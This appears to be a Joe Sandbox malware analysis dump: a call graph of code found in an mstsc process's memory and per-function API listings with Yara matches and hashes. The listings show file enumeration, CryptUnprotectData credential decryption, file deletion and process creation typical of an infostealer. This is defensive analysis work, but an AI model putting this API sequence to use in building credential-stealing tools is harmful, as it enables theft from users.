41e3f0 2 API calls 80771->80772 80774 411f38 80772->80774 80773 411f41 80773->80658 80774->80773 80944 411310 80774->80944 80776 411f6a 80777 411f8a 80776->80777 80974 411620 LdrLoadDll 80776->80974 80779 411fa8 80777->80779 80976 413b90 13 API calls 80777->80976 80786 411fc2 80779->80786 80978 40ad20 LdrLoadDll 80779->80978 80780 411f78 80780->80777 80975 411c30 10 API calls 80780->80975 80783 411f9c 80977 413b90 13 API calls 80783->80977 80787 411310 12 API calls 80786->80787 80788 411fef 80787->80788 80789 412010 80788->80789 80979 411620 LdrLoadDll 80788->80979 80790 41202e 80789->80790 80981 413b90 13 API calls 80789->80981 80793 412048 80790->80793 80983 40ad20 LdrLoadDll 80790->80983 80797 41e310 2 API calls 80793->80797 80794 411ffe 80794->80789 80980 411c30 10 API calls 80794->80980 80795 412022 80982 413b90 13 API calls 80795->80982 80800 412052 80797->80800 80800->80658 80802 4140b6 80801->80802 80803 40af20 LdrLoadDll 80802->80803 80804 4140e5 80803->80804 80805 40af20 LdrLoadDll 80804->80805 80806 414111 80804->80806 80805->80806 81003 40e2e0 80806->81003 80809 4141f5 80810 40d992 80809->80810 81008 40e320 80809->81008 81019 413da0 80809->81019 80812 415320 80810->80812 80813 40d998 80812->80813 80814 414090 13 API calls 80812->80814 80815 412db0 80813->80815 80814->80813 80816 412dd2 80815->80816 80817 40af20 LdrLoadDll 80816->80817 80818 412f9d 80817->80818 80819 40af20 LdrLoadDll 80818->80819 80820 412fae 80819->80820 80821 40adf0 LdrLoadDll 80820->80821 80822 412fc5 80821->80822 81099 412c80 80822->81099 80825 412c80 13 API calls 80826 41303b 80825->80826 80827 412c80 13 API calls 80826->80827 80828 413053 80827->80828 80829 412c80 13 API calls 80828->80829 80830 41306b 80829->80830 80831 412c80 13 API calls 80830->80831 80832 413083 80831->80832 80833 412c80 13 API calls 80832->80833 80835 41309e 80833->80835 80834 4130b8 80834->80664 80835->80834 80836 412c80 13 API calls 80835->80836 80837 4130ec 80836->80837 80838 412c80 13 API calls 80837->80838 80839 413129 80838->80839 80840 412c80 13 API calls 80839->80840 80841 413166 80840->80841 80842 412c80 13 API calls 80841->80842 80843 4131a3 80842->80843 80844 412c80 13 API calls 80843->80844 80845 4131e0 80844->80845 80845->80664 80847 4158bd 80846->80847 80848 40abd0 LdrLoadDll 80847->80848 80849 4158d8 80848->80849 80850 417340 LdrLoadDll 80849->80850 80869 415aa6 80849->80869 80851 415902 80850->80851 80852 417340 LdrLoadDll 80851->80852 80853 415915 80852->80853 80854 417340 LdrLoadDll 80853->80854 80855 415928 80854->80855 80856 417340 LdrLoadDll 80855->80856 80857 41593b 80856->80857 80858 417340 LdrLoadDll 80857->80858 80859 415951 80858->80859 80860 417340 LdrLoadDll 80859->80860 80861 415964 80860->80861 80862 417340 LdrLoadDll 80861->80862 80863 415977 80862->80863 80864 417340 LdrLoadDll 80863->80864 80865 41598a 80864->80865 80866 417340 LdrLoadDll 80865->80866 80867 41599f 80866->80867 80868 415b80 10 API calls 80867->80868 80867->80869 80871 415a21 80868->80871 80869->80666 80871->80869 81114 415460 LdrLoadDll 80871->81114 80873 40fa40 80872->80873 80874 40fa4b 80872->80874 80876 41e3f0 2 API calls 80873->80876 81115 40e740 80874->81115 80876->80874 80877 40fa61 80877->80668 80879 40fa5a 80879->80877 80880 40fa80 80879->80880 81124 40f7d0 80879->81124 80881 40fa98 80880->80881 80882 41e310 2 API calls 80880->80882 80881->80668 80882->80881 81143 410800 80883->81143 80885 410a8d 81166 4104e0 80885->81166 80887 40d9ce 80887->80545 80889 40c835 80888->80889 80900 41c490 80889->80900 80892 415b80 80893 415bfd 80892->80893 80894 416f30 10 API calls 80893->80894 80895 415d79 80893->80895 80894->80895 80895->80711 80896->80709 80897->80718 80898->80724 80899->80730 80901 41d3d0 LdrLoadDll 80900->80901 80902 41c4ac 80901->80902 80905 4622b80 LdrInitializeThunk 80902->80905 80903 40c8a9 80903->80709 80903->80892 80905->80903 80907 414e3c 80906->80907 80908 40abd0 LdrLoadDll 80907->80908 80909 414e57 80908->80909 80910 414e60 80909->80910 80911 417340 LdrLoadDll 80909->80911 80910->80752 80912 414e77 80911->80912 80913 417340 LdrLoadDll 80912->80913 80914 414e8c 80913->80914 80915 417340 LdrLoadDll 80914->80915 80916 414e9f 80915->80916 80917 417340 LdrLoadDll 80916->80917 80918 414eb2 80917->80918 80919 417340 LdrLoadDll 80918->80919 80920 414ec8 80919->80920 80921 417340 LdrLoadDll 80920->80921 80922 414edb 80921->80922 80923 40abd0 LdrLoadDll 80922->80923 80924 414f04 80923->80924 80925 417340 LdrLoadDll 80924->80925 80934 414fa0 80924->80934 80926 414f28 80925->80926 80927 40abd0 LdrLoadDll 80926->80927 80928 414f5d 80927->80928 80929 417340 LdrLoadDll 80928->80929 80928->80934 80930 414f7a 80929->80930 80931 417340 LdrLoadDll 80930->80931 80932 414f8d 80931->80932 80933 417340 LdrLoadDll 80932->80933 80933->80934 80934->80752 80936 414d75 80935->80936 80936->80761 80938 41d3d0 LdrLoadDll 80937->80938 80939 41c5bc 80938->80939 80943 4622ac0 LdrInitializeThunk 80939->80943 80940 41c5db 80940->80768 80942->80768 80943->80940 80945 41136a 80944->80945 80946 40af20 LdrLoadDll 80945->80946 80947 411446 80946->80947 80948 40af20 LdrLoadDll 80947->80948 80949 411461 80948->80949 80950 40c810 2 API calls 80949->80950 80951 411486 80950->80951 80952 4115cd 80951->80952 80996 41c520 80951->80996 80953 4115de 80952->80953 80984 410cd0 80952->80984 80953->80776 80957 4115c3 80958 41c890 2 API calls 80957->80958 80958->80952 80959 4114bf 80960 41c890 2 API calls 80959->80960 80961 4114f9 80960->80961 81001 41e4c0 LdrLoadDll 80961->81001 80963 41152f 80963->80953 80964 40c810 2 API calls 80963->80964 80965 411555 80964->80965 80965->80953 80966 41c520 2 API calls 80965->80966 80967 41157a 80966->80967 80968 411581 80967->80968 80969 4115ad 80967->80969 80970 41c890 2 API calls 80968->80970 80971 41c890 2 API calls 80969->80971 80972 41158b 80970->80972 80973 4115b7 80971->80973 80972->80776 80973->80776 80974->80780 80975->80777 80976->80783 80977->80779 80978->80786 80979->80794 80980->80789 80981->80795 80982->80790 80983->80793 80985 410cf5 80984->80985 80986 40af20 LdrLoadDll 80985->80986 80987 410db0 80986->80987 80988 40af20 LdrLoadDll 80987->80988 80989 410dd4 80988->80989 80990 416f30 10 API calls 80989->80990 80992 410e27 80990->80992 80991 410ee1 80991->80953 80992->80991 80993 40af20 LdrLoadDll 80992->80993 80994 410e8e 80993->80994 80995 416f30 10 API calls 80994->80995 80995->80991 80997 41c53c 80996->80997 80998 41d3d0 LdrLoadDll 80996->80998 81002 4622b00 LdrInitializeThunk 80997->81002 80998->80997 80999 4114b4 80999->80957 80999->80959 81001->80963 81002->80999 81004 417340 LdrLoadDll 81003->81004 81005 40e2ff 81004->81005 81006 40e306 GetFileAttributesW 81005->81006 81007 40e311 81005->81007 81006->81007 81007->80809 81009 40e6d2 81008->81009 81010 40e335 81008->81010 81009->80809 81010->81009 81011 416f30 10 API calls 81010->81011 81012 40e65d 81011->81012 81012->81009 81013 416f30 10 API calls 81012->81013 81014 40e691 81013->81014 81014->81009 81015 40e6a3 81014->81015 81017 40e6e2 81014->81017 81016 416f30 10 API calls 81015->81016 81016->81009 81017->81009 81018 416f30 10 API calls 81017->81018 81018->81009 81022 413db6 81019->81022 81043 41aba0 81019->81043 81021 413e0b 81021->80809 81022->81021 81023 413dd5 81022->81023 81024 413e17 81022->81024 81025 413dfa 81023->81025 81026 413ddd 81023->81026 81027 40af20 LdrLoadDll 81024->81027 81028 41e310 2 API calls 81025->81028 81029 41e310 2 API calls 81026->81029 81030 413e28 81027->81030 81028->81021 81031 413dee 81029->81031 81032 416f30 10 API calls 81030->81032 81031->80809 81033 413e3f 81032->81033 81083 4131f0 81033->81083 81035 413e4a 81039 413f48 81035->81039 81040 413e62 81035->81040 81036 413f2f 81037 41e310 2 API calls 81036->81037 81038 414053 81037->81038 81038->80809 81039->81036 81094 413780 12 API calls 81039->81094 81040->81036 81093 413780 12 API calls 81040->81093 81044 41abae 81043->81044 81045 41abb5 81043->81045 81044->81022 81046 40abd0 LdrLoadDll 81045->81046 81047 41abe7 81046->81047 81048 41abf6 81047->81048 81095 41a690 LdrLoadDll 81047->81095 81050 41e3f0 2 API calls 81048->81050 81052 41adaf 81048->81052 81051 41ac0f 81050->81051 81051->81052 81053 41ac24 81051->81053 81054 41ad5e 81051->81054 81052->81022 81096 4132d0 LdrLoadDll 81053->81096 81055 41ae01 81054->81055 81056 41ad68 81054->81056 81058 41e310 2 API calls 81055->81058 81097 4132d0 LdrLoadDll 81056->81097 81058->81052 81060 41ac3b 81062 417340 LdrLoadDll 81060->81062 81061 41ad7f 81098 41a020 LdrLoadDll 81061->81098 81064 41ac51 81062->81064 81066 417340 LdrLoadDll 81064->81066 81065 41ad95 81069 417340 LdrLoadDll 81065->81069 81067 41ac67 81066->81067 81068 417340 LdrLoadDll 81067->81068 81070 41ac7d 81068->81070 81069->81052 81071 417340 LdrLoadDll 81070->81071 81072 41ac96 81071->81072 81073 417340 LdrLoadDll 81072->81073 81074 41acac 81073->81074 81075 417340 LdrLoadDll 81074->81075 81076 41acc2 81075->81076 81077 417340 LdrLoadDll 81076->81077 81078 41acd8 81077->81078 81079 417340 LdrLoadDll 81078->81079 81080 41acfe 81079->81080 81080->81052 81081 41e310 2 API calls 81080->81081 81082 41ad52 81081->81082 81082->81022 81084 413206 81083->81084 81085 416f30 10 API calls 81083->81085 81086 413213 81084->81086 81087 416f30 10 API calls 81084->81087 81085->81084 81086->81035 81088 413224 81087->81088 81088->81086 81089 416f30 10 API calls 81088->81089 81090 41323f 81089->81090 81091 41e310 2 API calls 81090->81091 81092 41324c 81091->81092 81092->81035 81093->81040 81094->81039 81095->81048 81096->81060 81097->81061 81098->81065 81100 412ca9 81099->81100 81101 417340 LdrLoadDll 81100->81101 81102 412ce0 81101->81102 81103 417340 LdrLoadDll 81102->81103 81104 412cf8 81103->81104 81105 417340 LdrLoadDll 81104->81105 81107 412d14 81105->81107 81106 412d9c 81106->80825 81107->81106 81108 412d3e FindFirstFileW 81107->81108 81108->81106 81109 412d59 81108->81109 81110 412d83 FindNextFileW 81109->81110 81113 412b60 13 API calls 81109->81113 81110->81109 81112 412d95 FindClose 81110->81112 81112->81106 81113->81109 81114->80871 81116 40e760 81115->81116 81117 40e758 81115->81117 81118 41aba0 3 API calls 81116->81118 81117->80879 81119 40e773 81118->81119 81119->81117 81120 40af20 LdrLoadDll 81119->81120 81121 40e7fd 81120->81121 81122 40af20 LdrLoadDll 81121->81122 81123 40e80e 81122->81123 81123->80879 81125 40f7f7 81124->81125 81126 417340 LdrLoadDll 81125->81126 81127 40f8a6 81126->81127 81128 40f8b1 GetFileAttributesW 81127->81128 81129 40fa1f 81127->81129 81128->81129 81133 40f8c3 81128->81133 81129->80879 81130 40e320 10 API calls 81130->81133 81132 40af20 LdrLoadDll 81132->81133 81133->81129 81133->81130 81133->81132 81134 4131f0 10 API calls 81133->81134 81137 41aa40 81133->81137 81141 41a8d0 12 API calls 81133->81141 81142 41a770 12 API calls 81133->81142 81134->81133 81138 41aa56 81137->81138 81140 41ab56 81137->81140 81139 416f30 10 API calls 81138->81139 81138->81140 81139->81138 81140->81133 81141->81133 81142->81133 81144 410825 81143->81144 81145 40af20 LdrLoadDll 81144->81145 81146 41088a 81145->81146 81147 40af20 LdrLoadDll 81146->81147 81148 4108d8 81147->81148 81149 40e2e0 2 API calls 81148->81149 81150 41091f 81149->81150 81151 410926 81150->81151 81152 41aba0 3 API calls 81150->81152 81151->80885 81153 410934 81152->81153 81154 41093d 81153->81154 81155 40af20 LdrLoadDll 81153->81155 81154->80885 81158 41098c 81155->81158 81156 40e320 10 API calls 81156->81158 81157 41aa40 10 API calls 81157->81158 81158->81156 81158->81157 81160 410a11 81158->81160 81182 40ff40 81158->81182 81161 40e320 10 API calls 81160->81161 81162 410a69 81160->81162 81193 4102a0 81160->81193 81161->81160 81164 41e310 2 API calls 81162->81164 81165 410a70 81164->81165 81165->80885 81167 4104f6 81166->81167 81168 410501 81166->81168 81169 41e3f0 2 API calls 81167->81169 81170 40e740 3 API calls 81168->81170 81169->81168 81180 410510 81170->81180 81171 410517 81171->80887 81172 40e2e0 2 API calls 81172->81180 81173 4107d0 81174 4107e9 81173->81174 81175 41e310 2 API calls 81173->81175 81174->80887 81175->81174 81176 40e320 10 API calls 81176->81180 81177 41aa40 10 API calls 81177->81180 81178 40ff40 12 API calls 81178->81180 81179 40af20 LdrLoadDll 81179->81180 81180->81171 81180->81172 81180->81173 81180->81176 81180->81177 81180->81178 81180->81179 81181 4102a0 10 API calls 81180->81181 81181->81180 81183 40ff66 81182->81183 81184 416f30 10 API calls 81183->81184 81185 40ffc2 81184->81185 81186 4131f0 10 API calls 81185->81186 81187 40ffcd 81186->81187 81189 410150 81187->81189 81190 40ffeb 81187->81190 81188 410135 81188->81158 81189->81188 81191 40fe10 12 API calls 81189->81191 81190->81188 81199 40fe10 81190->81199 81191->81189 81194 4102c6 81193->81194 81195 416f30 10 API calls 81194->81195 81196 410337 81195->81196 81197 4131f0 10 API calls 81196->81197 81198 410342 81197->81198 81198->81160 81200 40fe26 81199->81200 81203 413660 81200->81203 81202 40ff2e 81202->81190 81204 41369d 81203->81204 81205 41374d 81204->81205 81206 414640 12 API calls 81204->81206 81207 4136f0 81204->81207 81205->81202 81206->81207 81208 413729 81207->81208 81209 41e310 LdrLoadDll RtlFreeHeap 81207->81209 81208->81202 81209->81208 81211 410f45 81210->81211 81212 417340 LdrLoadDll 81211->81212 81213 410f90 81212->81213 81214 4112fc 81213->81214 81215 416f30 10 API calls 81213->81215 81214->80672 81216 410fac 81215->81216 81216->81214 81261 41cae0 81216->81261 81218 410fe2 81219 4112e4 81218->81219 81221 41f500 3 API calls 81218->81221 81220 41e310 2 API calls 81219->81220 81220->81214 81222 411001 81221->81222 81222->81219 81223 411104 81222->81223 81224 41c300 2 API calls 81222->81224 81264 40bfb0 LdrLoadDll LdrInitializeThunk 81223->81264 81225 411085 81224->81225 81225->81223 81230 41108d 81225->81230 81227 41112f 81227->81219 81232 411164 81227->81232 81235 40bea0 2 API calls 81227->81235 81228 4110ea 81229 41e310 2 API calls 81228->81229 81233 4110fa 81229->81233 81230->81214 81230->81228 81231 4110b9 81230->81231 81234 40bea0 2 API calls 81230->81234 81236 41c890 2 API calls 81231->81236 81265 40bd20 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 81232->81265 81233->80672 81234->81231 81235->81232 81238 4110c9 81236->81238 81242 41b6e0 2 API calls 81238->81242 81239 411186 81240 4112c3 81239->81240 81241 411194 81239->81241 81244 41e310 2 API calls 81240->81244 81266 41c900 LdrLoadDll 81241->81266 81242->81228 81245 4112da 81244->81245 81245->80672 81246 4111b3 81247 40dec0 3 API calls 81246->81247 81248 411218 81247->81248 81248->81219 81249 411223 81248->81249 81250 41e310 2 API calls 81249->81250 81251 411247 81250->81251 81267 41c460 LdrLoadDll 81251->81267 81253 41125b 81254 41c410 2 API calls 81253->81254 81255 411282 81254->81255 81256 411289 81255->81256 81268 41c460 LdrLoadDll 81255->81268 81256->80672 81258 4112ab 81269 41c220 LdrLoadDll 81258->81269 81260 4112b9 81260->80672 81262 41caff CreateProcessInternalW 81261->81262 81263 41d3d0 LdrLoadDll 81261->81263 81262->81218 81263->81262 81264->81227 81265->81239 81266->81246 81267->81253 81268->81258 81269->81260 81270->80688 81271->80686 81272->80679
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 00412D4F
                                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 00412D8E
                                                                                                                                                                                      • FindClose.KERNELBASE(?), ref: 00412D99
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                                                                      • Opcode ID: d10bf51bb892601e2bd434e116e25794247cd466396b2d26ee92433fea3f2757
                                                                                                                                                                                      • Instruction ID: 9dc98169888af5d0786956e98aa4ee1233840b04c37aea2e559a857aa9e16780
                                                                                                                                                                                      • Opcode Fuzzy Hash: d10bf51bb892601e2bd434e116e25794247cd466396b2d26ee92433fea3f2757
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C319471900308BBDB20DF65CD85FEFB77CAF44705F14459DB909A7280D6B4AAD48BA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,?), ref: 004146D0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 834300711-3916222277
                                                                                                                                                                                      • Opcode ID: bddbab0ce1a3bc017cac492c3917048b1620c57e71186e3a480e7adb822d177d
                                                                                                                                                                                      • Instruction ID: 6c2bca83c060c99d28d51959825012b7509b776c0681bddd0c9a930eb7ec4154
                                                                                                                                                                                      • Opcode Fuzzy Hash: bddbab0ce1a3bc017cac492c3917048b1620c57e71186e3a480e7adb822d177d
                                                                                                                                                                                      • Instruction Fuzzy Hash: B2519776D00119AFDB10DFA9DC81AEEB7B8BF59304F04056FEA1DE3241E7346A848B95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtReadFile.NTDLL(00417260,00412534,FFFFFFFF,00416D4A,00000206,?,`rA,00000206,00416D4A,FFFFFFFF,00412534,00417260,00000206,00000000), ref: 0041C855
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                      • String ID: `rA
                                                                                                                                                                                      • API String ID: 2738559852-2873391168
                                                                                                                                                                                      • Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                                                                                                                                                      • Instruction ID: a94dd255e06309f79c03edd9e928242572fa202472457ad3a1a53f82497db766
                                                                                                                                                                                      • Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                                                                                                                                                      • Instruction Fuzzy Hash: 61F0B2B2200208AFCB14DF89DC85EEB77ADEF8C754F118249BE1DA7241D630E811CBA5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000005,00000000,0041709C,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,0041709C,00000000,00000005,00000060,00000000,00000000), ref: 0041C7AD
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                      • Opcode ID: fa55cba62b4dcf6efcde1521d539d09b86c621ef1dae617e37294dda7bcb8b72
                                                                                                                                                                                      • Instruction ID: 3872d80cafc8fec1f3c2b82925e9cf9b13c9ab783d1c11962d2c4a8cdcbbed4b
                                                                                                                                                                                      • Opcode Fuzzy Hash: fa55cba62b4dcf6efcde1521d539d09b86c621ef1dae617e37294dda7bcb8b72
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8901BDB6614508AFDB08DF98DC84EEB37A9AF8C754F118248BA0DE7241D630EC51CBA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000005,00000000,0041709C,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,0041709C,00000000,00000005,00000060,00000000,00000000), ref: 0041C7AD
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                      • Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                                                                                                                                                      • Instruction ID: bab88820c6e1be0377c7a8d580dce6a6b0a0e2638922616e67f40ecfd6a7a539
                                                                                                                                                                                      • Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                                                                                                                                                      • Instruction Fuzzy Hash: D3F0CFB2200208AFCB08CF89DC85EEB77EDAF8C754F018208BA0D97241C630F851CBA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                      • API String ID: 2340568224-3887548279
                                                                                                                                                                                      • Opcode ID: beef196a72e3c4086dde96845b902128b7316c476c367fac155a3ae6f61d2020
                                                                                                                                                                                      • Instruction ID: 8f6856715b2f873b1848b3217e1870704993bfd88f3bc692dfff91cc5f3d2371
                                                                                                                                                                                      • Opcode Fuzzy Hash: beef196a72e3c4086dde96845b902128b7316c476c367fac155a3ae6f61d2020
                                                                                                                                                                                      • Instruction Fuzzy Hash: 15A1C7B1D00208ABDB14EF65CD41AEFB7B8AF44304F10456EF545A7281EF78A7458FA9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00402D11,00002000,00003000,00000004), ref: 0041C979
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                                                      • Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                                                                                                                                                      • Instruction ID: 3d800af6f7dfb6d2b1dff716cacb2297240d93d6649296fe89e5f42b4a6e5449
                                                                                                                                                                                      • Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 12F015B2200218ABCB18DF89DC81EEB77ADAF88754F018109BE0997241C630F810CBB4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtDeleteFile.NTDLL(00417062,00000206,?,00417062,00000005,00000018,?,?,00000000,00000206,?), ref: 0041C885
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DeleteFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4033686569-0
                                                                                                                                                                                      • Opcode ID: 5d92fb98b5fd5c800c8cb3da522eb7fa3a84337e3ae126e0c9905766bdc5b286
                                                                                                                                                                                      • Instruction ID: 414c1e64917581d32677174bfdc36452721bf4a920b7be4d9078bc65eafb23ad
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d92fb98b5fd5c800c8cb3da522eb7fa3a84337e3ae126e0c9905766bdc5b286
                                                                                                                                                                                      • Instruction Fuzzy Hash: B8E08672500518ABC710DB94DC45ED77768EF44750F114559F90E9B642C570D6058BE0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtDeleteFile.NTDLL(00417062,00000206,?,00417062,00000005,00000018,?,?,00000000,00000206,?), ref: 0041C885
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DeleteFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4033686569-0
                                                                                                                                                                                      • Opcode ID: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
                                                                                                                                                                                      • Instruction ID: a77982f2a391823e83747124a9e8dcae09d4e5f7ff7ccd176278b97eb214dee4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
                                                                                                                                                                                      • Instruction Fuzzy Hash: 30D01772600218ABD710EB99DC89ED77BACEF48B60F114459BA1D9B242C670FA008BE1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtClose.NTDLL(0041723E,00000206,?,0041723E,00000005,FFFFFFFF), ref: 0041C8B5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Close
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                                                      • Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                                                                                                                                                      • Instruction ID: da8317a398eb2b06bc0a37c98d6992406396108723afcd6f7b7785c8ab9055dd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                                                                                                                                                      • Instruction Fuzzy Hash: CDD01772600218ABD614EBA9DC89EDB7BACDF48A60F014155BA1D9B242C670FA008AE1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
